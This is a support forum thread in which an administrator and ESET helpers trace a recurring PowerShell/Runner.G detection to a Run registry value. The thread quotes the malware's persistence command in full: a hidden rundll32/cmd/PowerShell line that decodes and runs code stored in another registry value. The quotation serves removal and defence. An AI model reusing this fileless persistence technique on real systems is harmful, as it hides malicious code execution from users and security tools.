PowerShell/Runner.G

[Carl S 1]

This keeps showing up in one of our client machines in registry with the Registry scanner Detection engine 20939 (20200303) :

Hash 8ECE3FFE602D59D1E38F9506F5DA1FC280AADAF8

  \REGISTRY\USER\S-1-5-21-3146671537-2346468688-2395455220-1182\Software\Microsoft\Windows\CurrentVersion\Run

the ESMC says that it was "cleaned by deleting," but then it shows up a few hours later. Is there some way to identify a process that is reinserting this?  Or what else should I do next?

[itman 1,662]

14 minutes ago, Carl S said:

\REGISTRY\USER\S-1-5-21-3146671537-2346468688-2395455220-1182\Software\Microsoft\Windows\CurrentVersion\Run

Did you manually check what's in that registry key? Display a screen shot of what's in the key.

[Carl S 1]

10 minutes ago, itman said:

Did you manually check what's in that registry key? Display a screen shot of what's in the key.

When I search for that key I don't find it in regedit.

[itman 1,662]

Search for:

HKEY_USERS\S-1-5-21-3146671537-2346468688-2395455220-1182\Software\Microsoft\Windows\CurrentVersion\Run

[Marcos 5,082]

Please provide ESET Log Collector logs from the machine.

[Carl S 1]

16 hours ago, itman said:

Search for:

HKEY_USERS\S-1-5-21-3146671537-2346468688-2395455220-1182\Software\Microsoft\Windows\CurrentVersion\Run

Duh, didn't catch that, I just cut and pasted.  Thanks.

[Carl S 1]

OK, found it by navigating to it.  Could not get search to work.

 

In the meantime, I have ESET client issues on that machine, probably due to my own fault. 

[itman 1,662]

50 minutes ago, Carl S said:

OK, found it by navigating to it.  Could not get search to work.

So was there anything present in that registry key?

[Carl S 1]

The suspicious part seems to be:

 

key: authHost

value:
rundll32 shell32.dll,ShellExec_RunDLL "cmd" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E').Auxibrkr))

 

[Carl S 1]

12 hours ago, Marcos said:

Please provide ESET Log Collector logs from the machine.

Working on this.  I killed off the ESET agent accidentally, while trying to uninstall the competitor's product that wasn't successfully uninstalled before installing the ESET agent.  Now up and running again, and will get the logs.  (Ok, it's collecting right now)

It's been years since I've submitted these type of logs, so remind me, do I attach them to the post, or send them in some other way? Seems like they may have some confidential stuff.

[Carl S 1]

13 hours ago, Marcos said:

Please provide ESET Log Collector logs from the machine.

Hmm.  I get a message from the Log Collector that says "An error occurred during collection of files. See the log for more info."

[itman 1,662]

1 hour ago, Carl S said:

The suspicious part seems to be:

 

key: authHost

value:
rundll32 shell32.dll,ShellExec_RunDLL "cmd" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E').Auxibrkr))

 

I would say it is malicious.

To be on the safe side, export the reg. key to a save location. Then delete this crud. If for some very remote reason removing the crud causes system issues, you can always import the reg. key to restore it.

Note that authhost.exe is a legit Win system process, but that is obviously what is not running here.

Edited March 5, 2020 by itman

[Carl S 1]

21 minutes ago, itman said:

I would say it is malicious.

To be on the safe side, export the reg. key to a save location. Then delete this crud. If for some very remote reason removing the crud causes system issues, you can always import the reg. key to restore it.

Note that authhost.exe is a legit Win system process, but that is obviously what is not running here.

Am I deleting the whole key / value pair or the value and leaving the key?

[Carl S 1]

14 hours ago, Marcos said:

Please provide ESET Log Collector logs from the machine.

Marcos, I re-ran the collector on a whim, and this time, it worked.  I now have the zip file ready.

[itman 1,662]

44 minutes ago, Carl S said:

Am I deleting the whole key / value pair or the value and leaving the key?

I believe what is shown in your reg. key is this:

BTW - when I tried to enter the rundll.exe code as data, Eset immmediately detected it as the PowerShell malware detection you're receiving. Hence, it doesn't display in the screen shot.

Anyway, you will be deleting "authHost" which BTW is not a registry key. It is a String value. Deleting authHost will also remove any data associated with it which is the malicious code.

Edited March 5, 2020 by itman

[itman 1,662]

I suspect what the malware did was a registry Import or equivalent to get around Eset's detection of the malicious code.

[itman 1,662]

Also checkout this reg key: HKCU:\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E .This is what the PowerShell script was using.

Have a feeling the "D4062752-23C4-26DB-4D48-07BAD1FC2B8E" sub-key has to go along with possibly the actual D4062752-23C4-26DB-4D48-07BAD1FC2B8E key itself.

Edited March 6, 2020 by itman

[Marcos 5,082]

10 hours ago, Carl S said:

Marcos, I re-ran the collector on a whim, and this time, it worked.  I now have the zip file ready.

You can upload it here, only ESET staff and the poster have access to attachments granted. Alternatively you can upload the archive to a safe location and drop me a personal message with a download link.

[Carl S 1]

14 hours ago, itman said:

Also checkout this reg key: HKCU:\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E .This is what the PowerShell script was using.

Have a feeling the "D4062752-23C4-26DB-4D48-07BAD1FC2B8E" sub-key has to go along with possibly the actual D4062752-23C4-26DB-4D48-07BAD1FC2B8E key itself.

I was thinking that myself, even though I'm not all that familiar with the registry, it was clear the powershell string was pointing to that other registry item.

[Carl S 1]

Hi Marcos, here is attachment.

I removed the value of the authHost line.  But other than that, everything else is the same.  FWIW, I have no new detections since the 4th.

10485-baker01-ees_logs.zip

[itman 1,662]

Just now, Carl S said:

I was thinking that myself, even though I'm not all that familiar with the registry, it was clear the powershell string was pointing to that other registry item.

Just be careful about deleting stuff from the registry. Either back it up first, or export any keys being modified/deleted prior to any registry cleaning exercise.

[Carl S 1]

12 minutes ago, itman said:

Just be careful about deleting stuff from the registry. Either back it up first, or export any keys being modified/deleted prior to any registry cleaning exercise.

Absolutely. For now, I'm holding off on any more changes until Marcos posts again to the thread. One of my main concerns was that the logs said ESET was cleaning by deleting repeatedly over several days, but clearly it was either not deleting or something was putting it back. For now, though, it's gone 16 hours or so without being re-detected and it is still not in the registry since manually removing it yesterday.

[Marcos 5,082]

Please delete the following registry values and then reboot the machine:
HKU\S-1-5-21-3146671537-2346468688-2395455220-1182\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\authHos
HKCU\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E\Auxibrkr